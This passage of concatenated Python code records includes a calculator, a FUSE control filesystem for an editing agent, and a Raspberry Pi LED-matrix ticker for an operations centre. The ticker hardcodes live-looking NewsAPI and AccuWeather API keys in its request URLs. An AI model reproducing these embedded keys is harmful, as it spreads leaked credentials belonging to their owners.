self.predator_positions[item]\n\n def create_positional_information(self, stimuli):\n for stimulus in stimuli:\n edge_index = 0\n if \"prey\" in stimulus:\n self.prey_positions[stimulus] = []\n while edge_index + 1 < len(stimuli[stimulus]):\n positions = self.interpolate_stimuli_positions(stimuli[stimulus], edge_index)\n self.prey_positions[stimulus] = self.prey_positions[stimulus] + positions\n edge_index += 1\n elif \"predator\" in stimulus:\n self.predator_positions[stimulus] = []\n while edge_index + 1 < len(stimuli[stimulus]):\n positions = self.interpolate_stimuli_positions(stimuli[stimulus], edge_index)\n self.predator_positions[stimulus] = self.predator_positions[stimulus] + positions\n edge_index += 1\n\n @staticmethod\n def interpolate_stimuli_positions(stimulus, edge_index):\n a = stimulus[edge_index][\"position\"]\n b = stimulus[edge_index + 1][\"position\"]\n t_interval = stimulus[edge_index + 1][\"step\"] - stimulus[edge_index][\"step\"]\n dx = (b[0] - a[0])/t_interval\n dy = (b[1] - a[1])/t_interval\n interpolated_positions = [[a[0]+dx*i, a[1]+dy*i] for i in range(t_interval)]\n return interpolated_positions\n","sub_path":"Environment/controlled_stimulus_environment_continuous.py","file_name":"controlled_stimulus_environment_continuous.py","file_ext":"py","file_size_in_byte":19193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"336881621","text":"class Calculator:\n\tdef __init__(self, Input):\n\t\tInput = Input.replace(\" \", \"\") #Removing spaces to make it less complicated. \n\t\tinputList = [y for x,y in enumerate(Input)] #Making a list of all letters of the Input.. For Example 2+2 = ['2', '+', '2']\n\t\tself.numList = [] \n\t\tself.opList = [] #op stands for operator \n\t\tself.tempNum = ''\n\t\tself.N = ['1','2','3','4','5','6','7','8','9','0', '.'] #Accepted Characters for input as a number. \n\t\tnumList, opList = self.formNumber(inputList) # Splitting inputList into numList, opList for eg, 2+2, numList = ['2', '2'] opList = ['+']\n\t\tnumList, opList = self.solve(numList, opList)\n\t\twhile ('+' in opList) or ('-' in opList) or ('*' in opList) or ('/' in opList) or ('^' in opList):\n\t\t\tnumList, opList = self.solve(numList, opList)\n\t\tself.result = numList[0]\n\n\tdef solveBrackets(self, Input):\n\t\tinputList = [y for x,y in enumerate(Input)]\n\t\tnumList, opList = [], []\n\t\ttempNum = ''\n\t\tfor y,x in enumerate(inputList):\n\t\t\tif str(x) in self.N:\n\t\t\t\ttempNum += str(x)\n\t\t\telse:\n\t\t\t\tif tempNum != '':\n\t\t\t\t\tnumList.append(float(tempNum))\n\t\t\t\ttempNum = ''\n\t\t\t\topList.append(x)\n\t\t\tif y+1 is len(inputList):\n\t\t\t\tif tempNum != '':\n\t\t\t\t\tnumList.append(float(tempNum))\n\t\t\t\ttempNum = ''\n\t\tnumList, opList = self.solve(numList, opList)\n\t\twhile ('+' in opList) or ('-' in opList) or ('*' in opList) or ('/' in opList) or ('^' in opList):\n\t\t\tnumList, opList = self.solve(numList, opList)\n\t\treturn numList[0]\n\n\tdef formNumber(self, inputList):\n\t\ttempNum = ''\n\t\tnumList = []\n\t\topList = []\n\t\tbrackets = False\n\t\tfor y,x in enumerate(inputList):\n\t\t\tif str(x) is '(':\n\t\t\t\tbrackets = True \n\t\t\t\tcontinue \n\t\t\telif str(x) is ')':\n\t\t\t\tbrackets = False \n\t\t\t\ttempNum = self.solveBrackets(tempNum)\n\t\t\t\tnumList.append(tempNum)\n\t\t\t\tcontinue\n\t\t\tif brackets:\n\t\t\t\ttempNum += str(x)\n\t\t\telse:\n\t\t\t\tif str(x) in self.N:\n\t\t\t\t\ttempNum = tempNum + str(x) \n\t\t\t\telse:\n\t\t\t\t\tif tempNum != '':\n\t\t\t\t\t\tnumList.append(float(tempNum))\n\t\t\t\t\ttempNum = ''\n\t\t\t\t\topList.append(x)\n\t\t\t\tif y+1 is len(inputList):\n\t\t\t\t\tnumList.append(float(tempNum))\n\t\t\t\t\ttempNum = ''\n\t\treturn numList, opList \n\n\tdef solve(self, numList, opList):\n\t\tfor x,y in enumerate(opList):\n\t\t\tif y is '^':\n\t\t\t\tnumList[x] = float(numList[x]) ** numList[x+1]\n\t\t\t\tnumList.remove(numList[x+1])\n\t\t\t\topList.remove(y)\n\t\tfor x,y in enumerate(opList):\n\t\t\tif y is '/':\n\t\t\t\tnumList[x] = float(numList[x]) / numList[x+1]\n\t\t\t\tnumList.remove(numList[x+1])\n\t\t\t\topList.remove(y)\n\t\tfor x,y in enumerate(opList):\n\t\t\tif y is '*':\n\t\t\t\tnumList[x] = float(numList[x]) * numList[x+1]\n\t\t\t\tnumList.remove(numList[x+1])\n\t\t\t\topList.remove(y)\n\t\tfor x,y in enumerate(opList):\n\t\t\tif y is '+':\n\t\t\t\tnumList[x] = float(numList[x]) + numList[x+1]\n\t\t\t\tnumList.remove(numList[x+1])\n\t\t\t\topList.remove(y)\n\t\tfor x,y in enumerate(opList):\n\t\t\tif y is '-':\n\t\t\t\tnumList[x] = float(numList[x]) - numList[x+1]\n\t\t\t\tnumList.remove(numList[x+1])\n\t\t\t\topList.remove(y)\n\t\treturn numList, opList \n\nwhile True:\n\ttry:\n\t\tcal = Calculator(raw_input(\"Enter An Equation: \")) #You may need to change raw_input to input if you are using python 3\n\t\tprint(cal.result)\n\texcept:\n\t\tprint(\"Sorry There's an error\")\n","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"644576020","text":"#!/usr/bin/env python3\n\nimport logging\nimport sys\nsys.path+=['..']\nfrom RTEAgent import *\nimport threading\n\nfrom collections import defaultdict\nfrom errno import ENOENT,EACCES\nfrom stat import S_IFDIR, S_IFLNK, S_IFREG\nfrom sys import argv, exit\nfrom time import time\n\nfrom fuse import FUSE, Operations, LoggingMixIn, FuseOSError\n\nif not hasattr(__builtins__, 'bytes'):\n bytes = str\n\nclass RTEAThread( threading.Thread ):\n def __init__( self, rteFS, rteAgent,filename, contents ):\n threading.Thread.__init__(self)\n self.rteFS = rteFS\n self.rteAgent = rteAgent\n self.filename = filename\n self.contents = contents\n def run( self ):\n logging.debug(\"Compile thread compiling, from change in file \"+self.filename)\n self.rteAgent.input( self.filename, self.contents )\n self.rteFS.files['/input']['st_mode'] = (S_IFDIR | 0o777)\n logging.debug(\"Compile thread finished\")\n \nclass RTEFS(LoggingMixIn, Operations):\n 'FS for control of the Real-Time Editing agent, drawing from the fusepy Example memory filesystem.'\n\n def __init__(self, agent):\n self.files = {}\n self.data = defaultdict(bytes)\n self.fd = 0\n now = time()\n self.files['/'] = dict(st_mode=(S_IFDIR | 0o777), st_ctime=now,\n st_mtime=now, st_atime=now, st_nlink=2)\n self.files['/input'] = dict(st_mode=(S_IFDIR | 0o777), st_ctime=now,\n st_mtime=now, st_atime=now, st_nlink=2)\n self.agent = agent\n \n def chmod(self, path, mode):\n self.files[path]['st_mode'] &= 0o770000\n self.files[path]['st_mode'] |= mode\n return 0\n\n def chown(self, path, uid, gid):\n self.files[path]['st_uid'] = uid\n self.files[path]['st_gid'] = gid\n\n def create(self, path, mode):\n self.files[path] = dict(st_mode=(S_IFREG | mode), st_nlink=1,\n st_size=0, st_ctime=time(), st_mtime=time(),\n st_atime=time())\n\n self.fd += 1\n return self.fd\n\n def getattr(self, path, fh=None):\n if path[0:7] == \"/input/\":\n st = os.lstat(agent.cwd + path[6:])\n self.files[path] = dict((key, getattr(st, key)) for key in ('st_atime', 'st_ctime',\n 'st_gid', 'st_mode', 'st_mtime', 'st_nlink',\n 'st_size', 'st_uid'))\n return self.files[path]\n if path not in self.files:\n raise OSError(ENOENT)\n\n return self.files[path]\n\n def getxattr(self, path, name, position=0):\n attrs = self.files[path].get('attrs', {})\n\n try:\n return attrs[name]\n except KeyError:\n return '' # Should return ENOATTR\n\n def listxattr(self, path):\n attrs = self.files[path].get('attrs', {})\n return attrs.keys()\n\n def mkdir(self, path, mode):\n self.files[path] = dict(st_mode=(S_IFDIR | mode), st_nlink=2,\n st_size=0, st_ctime=time(), st_mtime=time(),\n st_atime=time())\n\n self.files['/']['st_nlink'] += 1\n\n def open(self, path, flags):\n self.fd += 1\n return self.fd\n\n def read(self, path, size, offset, fh):\n return self.data[path][offset:offset + size]\n\n def readdir(self, path, fh):\n return ['.', '..'] + [x[1:] for x in self.files if x != '/']\n\n def readlink(self, path):\n return self.data[path]\n\n def removexattr(self, path, name):\n attrs = self.files[path].get('attrs', {})\n\n try:\n del attrs[name]\n except KeyError:\n pass # Should return ENOATTR\n\n def rename(self, old, new):\n self.files[new] = self.files.pop(old)\n\n def rmdir(self, path):\n self.files.pop(path)\n self.files['/']['st_nlink'] -= 1\n\n def statfs(self, path):\n return dict(f_bsize=512, f_blocks=4096, f_bavail=2048)\n\n def symlink(self, target, source):\n self.files[target] = dict(st_mode=(S_IFLNK | 0o777), st_nlink=1,\n st_size=len(source))\n\n self.data[target] = source\n\n def truncate(self, path, length, fh=None):\n self.data[path] = self.data[path][:length]\n self.files[path]['st_size'] = length\n\n def unlink(self, path):\n self.files.pop(path)\n\n def utimens(self, path, times=None):\n now = time()\n atime, mtime = times if times else (now, now)\n self.files[path]['st_atime'] = atime\n self.files[path]['st_mtime'] = mtime\n\n def write(self, path, data, offset, fh):\n self.data[path] = self.data[path][:offset] + data\n self.files[path]['st_size'] = len(self.data[path])\n return len(data)\n\n def release( self, path, fh ):\n #logging.debug(\"Releasing path : \"+path)\n #logging.debug(\"Data at the end of interaction is :\"+self.data[path])\n if path[0:7] == '/input/':\n #logging.debug(\"input file written, let's launch the whole shebang\")\n #Input file written\n #We remove writing rights to /input/ to prevent further editing\n self.files['/input']['st_mode'] = (S_IFDIR | 0000)\n #We launch the thread that will give them back\n RTEAThread( self, self.agent,path[7:],self.data[path] ).start()\n #TODO: We should check if a previous compilation is still running\n #logging.debug(\"thread started, returning\")\n #Give back control to user\n return 0\n\n def access( self, path, mode ):\n logging.debug(\"Calling access on \"+path)\n if path[0:6] == '/input':\n logging.debug(\"Checking wether /input can be accessed\")\n if self.files['/input']['st_mode'] == (S_IFDIR | 0000):\n logging.debug(\"Nope\")\n raise FuseOSError(EACCES)\n logging.debug(\"Yep\")\n return 0\n \n\n\n \nif __name__ == '__main__':\n if len(argv) != 2:\n print('usage: %s ' % argv[0])\n exit(1)\n\n logging.getLogger().setLevel(logging.INFO) #Or DEBUG ...\n logging.debug(\"Launching the agent\")\n agent = RTEAgent()\n fuse = FUSE(RTEFS( agent ), argv[1], foreground=True,auto_xattr=True)\n \n\n","sub_path":"RTEFS.py","file_name":"RTEFS.py","file_ext":"py","file_size_in_byte":6345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"135337590","text":"#!/usr/bin/python\nfrom rgbmatrix import Adafruit_RGBmatrix\n\"\"\"\nclass Adafruit_RGBmatrix(): # Debug environment\n def __init__(self, a=None, b=None): \n return\n def Clear(self):\n return\n def SetImage(self, a, b, c):\n return\n\"\"\"\n\nimport socket\norigGetAddrInfo = socket.getaddrinfo\ndef getAddrInfoWrapper(host, port, family=0, socktype=0, proto=0, flags=0):\n return origGetAddrInfo(host, port, socket.AF_INET, socktype, proto, flags)\nsocket.getaddrinfo = getAddrInfoWrapper\n\nimport Image\nimport ImageDraw\nimport ImageFont\n\nimport textwrap\nfrom datetime import datetime\nfrom time import gmtime, strftime\nimport time\n\nimport glob\nimport json\nimport logging\nimport os\nimport platform\nimport sys\nimport threading\nimport urllib, urllib2\n\nlogging.basicConfig(level=logging.DEBUG,format='[%(levelname)s] (%(threadName)-10s) %(message)s',)\n\ndef internetOn():\n try:\n urllib2.urlopen('http://216.58.192.142', timeout=2)\n return True\n except urllib2.URLError as err:\n return False\n\nclass MainThread():\n ############################################################\n # Constructor\n ############################################################ \n def __init__(self):\n self.sleep = 0.01\n self.text = None\n try:\n if ( platform.system() == \"Darwin\" ):\n self.font = ImageFont.truetype('/Library/Fonts/Arial Bold.ttf', 24)\n else:\n self.font = ImageFont.truetype('/usr/share/fonts/truetype/droid/DroidSansFallbackFull.ttf', 24)\n except:\n logging.debug( platform.system() )\n self.font = None;\n self.image_text = None\n self.news = None\n self.stock = None\n self.weather = None\n self.weatherlogo = None\n self.weathertext = None\n self.weathertime = os.path.getmtime(\"weather/weather.json\")\n self.default = None\n \n ## Events\n self.stop_event = threading.Event()\n self.stop_event.clear()\n self.input_event = threading.Event()\n self.input_event.clear()\n self.news_event = threading.Event()\n self.news_event.clear()\n self.nyan_event = threading.Event()\n self.nyan_event.clear()\n self.print_event = threading.Event()\n self.print_event.set()\n self.stock_event = threading.Event()\n self.stock_event.clear()\n self.stop_prompt = threading.Event()\n self.stop_prompt.clear()\n\n self.reload_thread = threading.Thread(target = self.reload, name = \"Reload Thread\")\n self.reload_thread.setDaemon(True)\n self.reload_thread.start()\n\n time.sleep(3)\n self.setImage()\n self.prompt_thread = threading.Thread(target = self.printout, name = \"Prompt Thread\")\n self.prompt_thread.setDaemon(True)\n self.prompt_thread.start()\n \n\n ############################################################\n # Thread settings\n ############################################################\n\n # Print Default\n def printout(self):\n while not self.stop_event.is_set():\n # Input event\n if self.input_event.is_set():\n self.stop_prompt.clear()\n logging.debug(\"Printing input: \" + str(self.text) )\n self.setImage(self.text)\n self.prompt(True, False)\n \n # If there are input while prompt\n #if self.stop_prompt.is_set() and self.input_event.is_set():\n if self.input_event.is_set():\n logging.debug(\"New input while print. Continue: \" + str(self.text) )\n continue\n logging.debug(\"End printing input: \" + str(self.text) )\n self.text = None\n # Back to print mode\n self.input_event.clear()\n self.stop_prompt.clear()\n self.print_event.set()\n\n # News event\n elif self.news_event.is_set():\n self.stop_prompt.clear()\n logging.debug(\"Printing news: \" + str(self.text) )\n self.printNews()\n \n self.text = None\n self.setImage()\n self.stop_prompt.clear()\n logging.debug(\"End news mode.\")\n # Back to print mode\n self.news_event.clear()\n self.stop_prompt.clear()\n self.print_event.set()\n\n \n # Nyan event\n elif self.nyan_event.is_set():\n self.stop_prompt.clear()\n logging.debug(\"Nyan event\")\n self.printNyan()\n # If there are any input while prompt\n if self.stop_prompt.is_set() and self.nyan_event.is_set():\n logging.debug(\"New nyan request while print. Continue\" )\n continue\n elif self.stop_prompt.is_set():\n logging.debug(\"Going to other mode.\")\n continue\n logging.debug(\"End printing nyan\" )\n # Back to print mode\n self.nyan_event.clear()\n self.stop_prompt.clear()\n self.print_event.set()\n\n # Stock event\n elif self.stock_event.is_set():\n self.stop_prompt.clear()\n logging.debug(\"Printing stock: \" + str(self.stock) )\n self.printStock()\n \n self.text = None\n self.setImage()\n self.stop_prompt.clear()\n logging.debug(\"End stock mode.\")\n # Back to print mode\n self.stock_event.clear()\n self.stop_prompt.clear()\n self.print_event.set()\n\n # Print event\n elif self.print_event.is_set():\n self.stop_prompt.clear()\n self.print_event.wait()\n logging.debug(\"Printing default image: \" + str(self.text))\n self.setImage()\n self.prompt()\n\n # Else (silent mode)\n else:\n logging.debug(\"No mode is turned on! Wait until print_event is on.\")\n self.print_event.wait()\n \n # Reload Image\n def reload(self):\n while not self.stop_event.is_set():\n self.print_event.wait()\n try:\n logging.debug(\"Reloading Image: \" + str(self.image_text))\n except:\n logging.debug(\"Reloading Image/Not promptable\")\n self.setWeather()\n #self.setImage()\n self.setDefaultImage()\n #self.image.save(\"testing2.png\", \"PNG\")\n time.sleep(1)\n\n \n ############################################################\n # User Facing commands\n ############################################################\n def input(self, input):\n self.print_event.clear()\n self.news_event.clear()\n self.nyan_event.clear()\n self.stock_event.clear()\n self.stop_prompt.set()\n matrix.Clear()\n self.text = input\n self.input_event.set()\n\n def readNews(self):\n self.print_event.clear()\n self.nyan_event.clear()\n self.input_event.clear()\n self.stock_event.clear()\n self.stop_prompt.set()\n matrix.Clear()\n self.news_event.set()\n raw_input('News mode. Press anything to continue...')\n logging.debug(\"Exit news mode triggered\")\n self.stop_prompt.set()\n #self.news_event.clear()\n\n def readStock(self):\n self.print_event.clear()\n self.news_event.clear()\n self.nyan_event.clear()\n self.input_event.clear()\n self.stop_prompt.set()\n matrix.Clear()\n self.stock_event.set()\n raw_input('Stock mode. Press anything to continue...')\n logging.debug(\"Exit stock mode triggered\")\n self.stop_prompt.set()\n\n def reset(self):\n logging.debug(\"Return to regular state\")\n matrix.Clear()\n self.input_event.clear()\n self.news_event.clear()\n self.nyan_event.clear()\n self.stock_event.clear()\n self.stop_prompt.set()\n self.print_event.set()\n\n\n def nyan(self):\n logging.debug(\"Nyan mode\")\n self.print_event.clear()\n self.input_event.clear()\n self.news_event.clear()\n self.stock_event.clear()\n self.stop_prompt.set()\n self.nyan_event.set()\n matrix.Clear()\n\n \n def silent(self):\n self.print_event.clear()\n self.input_event.clear()\n self.news_event.clear()\n self.nyan_event.clear()\n self.stock_event.clear()\n self.stop_prompt.set()\n matrix.Clear()\n raw_input('Silent mode. Press anything to continue...')\n self.stop_prompt.clear()\n self.print_event.set()\n\n def setSpeed(self, char):\n if char is \"+\":\n self.sleep -= 0.005 if self.sleep > 0.00005 else 0\n #self.sleep = self.sleep - 0.005 if self.sleep > 0.1 else 0.005\n if char is \"-\":\n self.sleep += 0.005 if self.sleep < 1 else 0\n #self.sleep = self.sleep + 0.05 if self.sleep < 5 else 4.95\n logging.debug(str(self.sleep))\n\n def stop(self):\n self.stop_event.set()\n \n ############################################################\n # Methods\n ############################################################\n \n def setImage(self, default=None):\n global rasplogo,akamailogo\n\n # Set word text\n userinput = default or \"This is Akamai Cambridge Security Operation Command Center (SOCC). \" + strftime(\"%H:%M:%S %Z\", time.localtime()) + strftime(\" (%H:%M:%S GMT)\", time.gmtime())\n self.image_text = userinput\n text = self.textToImage(userinput)\n textwidth = text.size[0]\n\n # Set logo\n akamaiwidth = akamailogo.size[0]\n raspwidth = rasplogo.size[0]\n\n # Set weather\n weather = self.weather\n weatherlogo = self.weatherlogo\n weatherwidth = None if weather is None else weather.size[0] \n weatherlogowidth = None if weatherlogo is None else weatherlogo.size[0]\n weathertext = None or self.weathertext\n if weathertext is not None:\n self.image_text = userinput + \" \" + weathertext\n\n # Set width\n width = 10 + akamaiwidth + 10 + textwidth + 10 + raspwidth + 10\n width += weatherlogowidth + 10 + weatherwidth + 10 if weather is not None and weatherlogo is not None else 0\n width *= 2 if default is None else 1\n self.width = width\n\n # Create final image\n image = Image.new(\"RGBA\", (width, 32))\n temp = 10\n image.paste(akamailogo,(temp,0))\n temp += akamaiwidth + 10 \n image.paste(text, (temp,0))\n temp += textwidth + 10\n image.paste(rasplogo, (temp, 0))\n if weather is not None and weatherlogo is not None and default is None:\n temp += raspwidth + 10\n image.paste(weather, (temp, 0))\n temp += weatherwidth + 10\n image.paste(weatherlogo, (temp, 0))\n if default is None:\n image.paste(image, ( width/2 ,0))\n self.image = image\n\n \n def setDefaultImage(self):\n global akamailogo\n if self.default is None:\n self.setImage()\n self.default = self.image\n userinput = \"This is Akamai Cambridge Security Operation Command Center (SOCC). \" + strftime(\"%H:%M:%S %Z\", time.localtime()) + strftime(\" (%H:%M:%S GMT)\", time.gmtime())\n text = self.textToImage(userinput)\n textloc1 = 10 + akamailogo.size[0] + 10\n textloc2 = 10 + akamailogo.size[0] + 10 + self.default.size[0] / 2\n self.image = self.default\n self.image.paste(text, (textloc1,0))\n self.image.paste(text, (textloc2,0))\n\n\n\n\n \n def setNews(self):\n self.news = None\n file = \"news/news.json\"\n key = \"06e1a2dceeba46c89de4eecc8aaf24c0\"\n #url = \"https://newsapi.org/v1/articles?source=google-news&sortBy=top&apiKey=\" + key\n url = \"https://newsapi.org/v1/articles?source=the-next-web&sortBy=latest&apiKey=\" + key\n duration = 60 * 30 # 30 Minutes\n filelastupdate = time.time() - os.path.getmtime(file)\n logging.debug(\"json file too old? \" + str(filelastupdate ) + \" > \" + str(duration) + \": \" + str(filelastupdate > duration))\n if filelastupdate > duration: # json file too old?\n try:\n urllib.urlretrieve( url, file) # Try fetch json file\n logging.debug(\"Obtained news json.\")\n except:\n logging.debug(\"Could not load article.\")\n else:\n logging.debug(\"Using old json file.\")\n # Get weather information\n try:\n newsfile = open(file)\n newsjson = json.load(newsfile)\n self.news = [entry[\"description\"] for entry in newsjson[\"articles\"]]\n #self.news = newsjson[\"articles\"]\n logging.debug(str(self.news))\n except:\n logging.exception(\"ERROR!\")\n logging.debug(\"Error loading json file\")\n self.text = \"Error loading json file.\"\n logging.debug(\"Ending print news\")\n\n def setStock(self):\n self.stock = None\n file = \"stock/stock.json\"\n stocktype = [\"INDEXDJX:%20.DJI\", \"INDEXNASDAQ:%20.IXIC\", \"INDEXSP:%20.INX\", \"NASDAQ%3aAKAM\"]\n stocknames = [\"INDEXDJX\", \"INDEXNASDAQ\", \"INDEXSP\", \"AKAM\"]\n url = \"https://finance.google.com/finance?output=json&q=\"\n duration = 60 * 10 # 10 Minutes\n filelastupdate = time.time() - os.path.getmtime(file)\n logging.debug(\"json file too old? \" + str(filelastupdate) + \" > \" + str(duration) + \": \" + str(filelastupdate > duration))\n if filelastupdate > duration: # json file too old?\n stockdata = []\n try:\n for stock, stockname in zip(stocktype, stocknames):\n stockname = \"stock/\" + stockname + \".json\"\n logging.debug(\"Obtaining stockname: \" + stockname)\n logging.debug(\"URL: \" + url + stock)\n data = urllib2.urlopen( url + stock ).read().replace(\"//\", \"\")\n stockdata.append(json.loads(data)[0])\n logging.debug(\"Data persable.\")\n with open(file, 'w') as filename:\n json.dump(stockdata, filename, sort_keys=True, indent=4)\n except:\n logging.debug(\"Unable to obtain new json.\")\n try:\n with open(file, 'r') as filename:\n stockjson = json.load(filename)\n stockname = [\"DOW\",\"NASDAQ\",\"S&P\",\"AKAM\"]\n getlist = lambda x: [entry[x] for entry in stockjson]\n lists = [stockname, getlist(\"l\"), getlist(\"c\"), getlist(\"cp\")]\n result = {z[0]:list(z[1:]) for z in zip (*lists)}\n self.stock = result\n logging.debug(str(self.stock))\n except:\n logging.exception(\"ERROR!\")\n logging.debug(\"Error loading json file\")\n self.text = \"Error loading json file.\"\n logging.debug(\"Ending print stock\")\n \n def setStockImage(self):\n global rasplogo,akamailogo, up, down\n # Set logo\n akamaiwidth = akamailogo.size[0]\n raspwidth = rasplogo.size[0]\n\n # Initial width\n width = 0\n self.image_text = \"\"\n imagelist = []\n\n for stockname, stockinfo in self.stock.iteritems():\n # Price\n price = stockname + \" \" + stockinfo[0] + \" \"\n self.image_text += price\n priceimage = self.textToImage(price, \"white\")\n\n # Price Change\n pricec = stockinfo[1] + \" (\" + stockinfo[2] + \" %)\"\n self.image_text += pricec\n color = \"green\" if float(stockinfo[1]) >= 0 else \"red\"\n updown = up if color is \"green\" else down\n pricecimage = self.textToImage(pricec, color)\n\n # Set width\n pricewidth = priceimage.size[0] + 10 + updown.size[0] + 10 + pricecimage.size[0]\n\n tempwidth = 10 + akamaiwidth + 10 + pricewidth + 10 + raspwidth + 10\n # Create image\n tempimage = Image.new(\"RGBA\", (tempwidth, 32))\n width += tempwidth\n\n temp = 10\n tempimage.paste(akamailogo,(temp,0))\n temp += akamaiwidth + 10 \n tempimage.paste(priceimage, (temp,0))\n temp += priceimage.size[0] + 10\n tempimage.paste(updown, (temp,0))\n temp += updown.size[0] + 10\n tempimage.paste(pricecimage, (temp,0))\n temp += pricecimage.size[0] + 10\n tempimage.paste(rasplogo, (temp, 0))\n\n imagelist.append(tempimage)\n # Final image\n image = Image.new(\"RGBA\", (width, 32))\n temp = 0\n for img in imagelist:\n image.paste(img, (temp, 0))\n temp += img.size[0]\n self.width = width\n self.image = image\n\n\n def setWeather(self, force=False):\n logging.debug(\"Set weather\")\n now = time.time()\n duration = 60 * 30 # 30 Minutes\n file = \"weather/weather.json\"\n\n filelastupdate = time.time() - self.weathertime\n logging.debug(\"json: \" + str(filelastupdate ) + \" ?< \" + str (duration) + \" \" + str(filelastupdate > duration))\n if filelastupdate > duration or force: # json file too old?\n try:\n weatherurl = \"http://dataservice.accuweather.com/currentconditions/v1/329319?apikey=h7Z47DvD4mpW0b1iQzuL4sMLVgvc4PI6\"\n urllib.urlretrieve( weatherurl, file) # Try fetch json file\n self.weathertime = os.path.getmtime(file)\n except:\n return\n else:\n logging.debug(\"Using old json file.\")\n return # Won't load the json until the firs expire\n # Get weather information\n try:\n self.default = None # Used to update setDefaultImage\n weatherfile = open(file)\n weatherjson = json.load(weatherfile)[0]\n c_temp = weatherjson[\"Temperature\"][\"Metric\"][\"Value\"]\n f_temp = weatherjson[\"Temperature\"][\"Imperial\"][\"Value\"]\n weathertext = \"{} F ({} C)\".format(f_temp,c_temp)\n weatherimage = self.textToImage(weathertext)\n self.weathertext = weathertext\n self.weather = weatherimage\n except:\n logging.exception(\"ERROR!\")\n logging.debug(\"Error loading json file\")\n self.text = \"Error loading json file.\"\n return\n\n # Weather icon\n #logging.debug(\"Try finding a logo...\")\n url = \"https://developer.accuweather.com/sites/default/files/\"\n iconname = \"{:0>2}-s.png\".format(weatherjson[\"WeatherIcon\"])\n if not os.path.isfile(\"weather/\" + iconname): # Image not available?\n try:\n # Try fetch image file\n logging.debug(\"No weather logo! Try to fetch new...\")\n urllib.urlretrieve( url+iconname, \"weather/\" + iconname)\n # Remove white color\n weatherlogo = Image.open(\"weather/\" + str(iconname)).convert(\"RGBA\")\n weatherlogo.thumbnail((60, 60), Imag.AeNTIALIAS)\n background = Image.new(\"RGBA\",(32, 32),color=(255,255,255,0))\n background.paste(weatherlogo,(0,0),weatherlogo)\n weatherlogo.save(\"weather/\" + iconname, \"PNG\")\n #weatherlogo.close()\n except Exception as ex:\n logging.debug(\"Something happened while try to fetch weather file.\")\n logging.exception(\"ERROR!!\")\n return\n weatherlogo = Image.open(\"weather/\" + iconname).convert(\"RGBA\")\n #logging.debug(str(weatherlogo))\n self.weatherlogo = weatherlogo\n\n \n def printNews(self):\n while True:\n self.setNews()\n for news in self.news:\n self.text = str(\"[News] \") + news\n self.setImage(self.text)\n try:\n logging.debug(\"Printing news: \" + self.text)\n except:\n logging.exception\n self.prompt(True, True, True)\n # If there are news while prompt\n if self.stop_prompt.is_set() and self.news_event.is_set():\n logging.debug(\"Exitting news mode\")\n return True\n elif self.stop_prompt.is_set():\n logging.debug(\"Going to other mode.\")\n return True\n elif self.news_event.is_set() is False:\n logging.debug(\"News mode ended.\")\n return True\n logging.debug(\"Reached to the end of news\" )\n\n def printStock(self):\n while True:\n self.setStock()\n self.setStockImage()\n self.text = self.image_text\n try:\n logging.debug(\"Printing stock: \" + self.image_text + \" \" + str(self.width))\n except:\n logging.exception\n self.prompt(True, True, True)\n # If there are stock while prompt\n if self.stop_prompt.is_set() and self.stock_event.is_set():\n logging.debug(\"Exitting stock mode\")\n return True\n elif self.stop_prompt.is_set():\n logging.debug(\"Going to other mode.\")\n return True\n elif self.stock_event.is_set() is False:\n logging.debug(\"Stock mode ended.\")\n return True\n logging.debug(\"Reached to the end of stock\" )\n\n \n def printNyan(self):\n global nyan_list\n width = nyan_list[0].size[0]\n n = -width * 2/3\n temp_width = -width * 2/3\n i = 0\n matrix.Clear()\n while n < 0:\n for file in nyan_list:\n matrix.SetImage(file.im.id, n, 0)\n n += 1\n if n == -width * 1/3 and i < 64:\n n -= 1\n i += 1\n self.stop_prompt.wait(0.045)\n if self.stop_prompt.is_set():\n return\n logging.debug(\"Finish printing Nyan. Location: \" + str(n) + \"/\" + str(width))\n\n \n def prompt(self, word=False, second=False, news=False):\n while not self.stop_event.is_set() or self.stop_prompt.is_set():\n if self.stop_prompt.is_set():\n return\n if second is False:\n logging.debug(\"Start first loop!\")\n matrix.Clear()\n while not self.stop_prompt.is_set():\n start = 0 if second else SIZE\n end = -self.width if word else -self.width/2\n if word is True and second is True:\n start = SIZE\n for n in range (start, end, -1):\n # Exit if halted by event\n matrix.SetImage(self.image.im.id, n, 0)\n #logging.debug(\"prompting: \" +str(n) + \"/\" + str(end))\n self.stop_prompt.wait(self.sleep)\n if self.stop_prompt.is_set():\n return\n\n # If news, exit after the first cycle\n if news is True:\n return\n\n # If not news, continue to make repeat\n if second is False:\n if word is True:\n logging.debug(\"Second word loop!\")\n self.prompt(True, True)\n return\n else:\n logging.debug(\"Start second~ loop!\")\n self.prompt(False,True)\n return\n\n\n #def textToImage(self, input, color=\"black\"):\n def textToImage(self, input, color=128):\n text = textwrap.fill(input, 100)\n orig = Image.new(\"RGBA\", (512,32))\n textsize = ImageDraw.Draw(orig).textsize(text, self.font)\n final = Image.new(\"RGBA\", textsize)\n draw = ImageDraw.Draw(final)\n draw.text((0, 0), input, fill = color, font=self.font)\n return final\n \n \n\n############################################################\n# Main Thread\n############################################################\n\nif __name__ == '__main__':\n while True:\n try:\n matrix = Adafruit_RGBmatrix(32, 4)\n SIZE = 32 * 4\n matrix.Clear()\n\n nyan_list = []\n for filename in sorted(glob.glob('nyan/*.png'), key=lambda name: int(name[10:-4])):\n logging.debug(filename)\n im=Image.open(filename)\n im.thumbnail((384, 32), Image.ANTIALIAS)\n nyan_list.append(im)\n\n rasplogo = Image.open(\"rasplogo_s.png\")\n akamailogo = Image.open(\"akamailogo_s.png\")\n\n up = Image.open(\"stock/up.png\")\n down = Image.open(\"stock/down.png\")\n\n thread = MainThread()\n logging.debug(\"Starting main thread.\")\n except:\n logging.exception(\"EXCEPTION\")\n break\n continue\n break\n while True:\n try:\n input = raw_input('>>')\n logging.debug(\"input: \" + str(input))\n if len(input) > 2500:\n pass\n elif input == \"-\" or input == \"+\":\n thread.setSpeed(input)\n elif input == \"1\":\n input = str(\"Cambridge is ready\")\n thread.input(input)\n elif input == \"2\":\n input = str(\"Cambridge has nothing to handover.\")\n thread.input(input)\n elif input == \"3\":\n input = str(\"HAVE A GOOD SHIFT!!\")\n thread.input(input)\n elif input == \"4\" or input == 